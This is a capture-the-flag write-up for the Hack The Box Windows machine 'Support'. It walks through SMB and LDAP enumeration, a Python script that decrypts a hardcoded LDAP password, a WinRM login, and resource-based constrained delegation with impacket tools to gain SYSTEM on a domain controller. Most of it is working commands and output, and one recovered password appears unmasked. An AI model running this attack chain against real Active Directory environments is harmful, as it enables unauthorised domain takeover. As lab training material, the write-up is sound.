Support

#windows #easy #ldap

Support

https://app.hackthebox.com/machines/Support

Enumeration

sudo nmap -p- -sS --open --min-rate 5000 -Pn -n -vv 10.10.11.174 -oA openPorts
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49674/tcp open  unknown          syn-ack ttl 127
49678/tcp open  unknown          syn-ack ttl 127
49702/tcp open  unknown          syn-ack ttl 127
49740/tcp open  unknown          syn-ack ttl 127
cat openPorts.nmap | grep -oP '^[0-9]{1,5}' | tr '\n' ',' | sed 's/,$//'
nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49674,49678,49702,49740 -sCV -Pn 10.10.11.174 -oA targeted
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-19 14:20:01Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49740/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-06-19T14:20:59
|_  start_date: N/A
smbclient -N -L //10.10.11.174
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
support-tools   Disk      support staff tools
SYSVOL          Disk      Logon server share 
smbclient -N //10.10.11.174/support-tools
smb: \> ls
  .                                   D        0  Wed Jul 20 14:01:06 2022
  ..                                  D        0  Sat May 28 08:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 08:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 08:19:55 2022
  putty.exe                           A  1273576  Sat May 28 08:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 08:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 14:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 08:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 08:19:43 2022
smb: \> get UserInfo.exe.zip
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (44.4 KiloBytes/sec) (average 44.4 KiloBytes/sec)
mkdir UserInfo
unzip UserInfo.exe.zip -d UserInfo
file UserInfo.exe
UserInfo.exe: PE32 executable for MS Windows 6.00 (console), Intel i386 Mono/.Net assembly, 3 sections

https://github.com/icsharpcode/AvaloniaILSpy/releases

LdapQuery
echo '10.10.11.174 support.htb' | sudo tee -a /etc/hosts
Protected
import base64

enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"

data = bytearray(base64.b64decode(enc_password))

for i in range(len(data)):
    data[i] = (data[i] ^ key[i % len(key)]) ^ 0xDF

password = data.decode('utf-8', errors='replace')

print("Decoded password:", password)
python3 decode.py
Decoded password: nvE***********lmz
ldapsearch -H ldap://support.htb -D "ldap@support.htb" -w 'nvE***********lmz' -b "dc=support,dc=htb" "(sAMAccountName=support)"
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20250619114726.0Z
uSNCreated: 12617
info: Iron********************hful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
uSNChanged: 86091
company: support
streetAddress: Skipper Bowles Dr
name: support
objectGUID:: CqM5MfoxMEWepIBTs5an8Q==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 133948093916831645
lastLogoff: 0
lastLogon: 133948094435113580
pwdLastSet: 132982099209777070
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: support
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
dSCorePropagationData: 20220528111201.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 133948072466987886
evil-winrm -i 10.10.11.174 -u support -p 'Iron********************hful'
*Evil-WinRM* PS C:\Users\support\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> dir


    Directory: C:\Users\support\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         6/19/2025   4:26 AM             34 user.txt


*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
a677************************e149

Privilege Escalation

nxc ldap 10.10.11.174 -d support.htb --dns-server 10.10.11.174 -u 'support' -p 'Iron********************hful' --bloodhound -c All
LDAP        10.10.11.174    389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
LDAP        10.10.11.174    389    DC               [+] support.htb\support:Ironside47pleasure40Watchful 
LDAP        10.10.11.174    389    DC               Resolved collection methods: psremote, localadmin, container, trusts, acl, dcom, session, objectprops, group, rdp
LDAP        10.10.11.174    389    DC               Done in 00M 38S
LDAP        10.10.11.174    389    DC               Compressing output into /home/kali/.nxc/logs/DC_10.10.11.174_2025-06-19_140016_bloodhound.zip
sudo sed -i '/support\.htb/ s/$/ dc.support.htb/' /etc/hosts

Resource Based Constrained Delegation

Resource Based Constrained Delegation

*Evil-WinRM* PS C:\Users\support\Documents> upload PowerView.ps1
                                        
Info: Uploading /home/kali/htb/machines/support/exploits/PowerView.ps1 to C:\Users\support\Documents\PowerView.ps1
                                        
Data: 1027036 bytes of 1027036 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\support\Documents> . .\PowerView.ps1
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity

name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC
impacket-addcomputer support.htb/support:Ironside47pleasure40Watchful -computer-name 'SANDIA$' -computer-pass 'Password123!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account SANDIA$ with password Password123!.
*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -identity SANDIA


DistinguishedName : CN=SANDIA,CN=Computers,DC=support,DC=htb
DNSHostName       :
Enabled           : True
Name              : SANDIA
ObjectClass       : computer
ObjectGUID        : c738df45-c007-44cb-a8b2-b087b866f8cd
SamAccountName    : SANDIA$
SID               : S-1-5-21-1677581083-3380853377-188903654-5603
UserPrincipalName :

*Evil-WinRM* PS C:\Users\support\Documents> Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount SANDIA$
*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount


DistinguishedName                    : CN=DC,OU=Domain Controllers,DC=support,DC=htb
DNSHostName                          : dc.support.htb
Enabled                              : True
Name                                 : DC
ObjectClass                          : computer
ObjectGUID                           : afa13f1c-0399-4f7e-863f-e9c3b94c4127
PrincipalsAllowedToDelegateToAccount : {CN=SANDIA,CN=Computers,DC=support,DC=htb}
SamAccountName                       : DC$
SID                                  : S-1-5-21-1677581083-3380853377-188903654-1000
UserPrincipalName                    :

*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | select msds-allowedtoactonbehalfofotheridentity

msds-allowedtoactonbehalfofotheridentity
----------------------------------------
{1, 0, 4, 128...}

Sincronizar la hora con la del servidor

impacket-getST -spn host/DC.support.htb -impersonate Administrator support.htb/sandia:Password123!
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@host_DC.support.htb@SUPPORT.HTB.ccache

export KRB5CCNAME=Administrator@host_DC.support.htb@SUPPORT.HTB.ccache

impacket-psexec -k -no-pass support.htb/Administrator@DC.support.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on DC.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file tzGLJWnY.exe
[*] Opening SVCManager on DC.support.htb.....
[*] Creating service HAxd on DC.support.htb.....
[*] Starting service HAxd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 955A-5CBB

 Directory of C:\Users\Administrator\Desktop

05/28/2022  04:17 AM    <DIR>          .
05/28/2022  04:11 AM    <DIR>          ..
06/20/2025  03:01 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,912,007,680 bytes free

C:\Users\Administrator\Desktop> type root.txt
df52************************53ab
PreviousLameNextTwoMillion

Last updated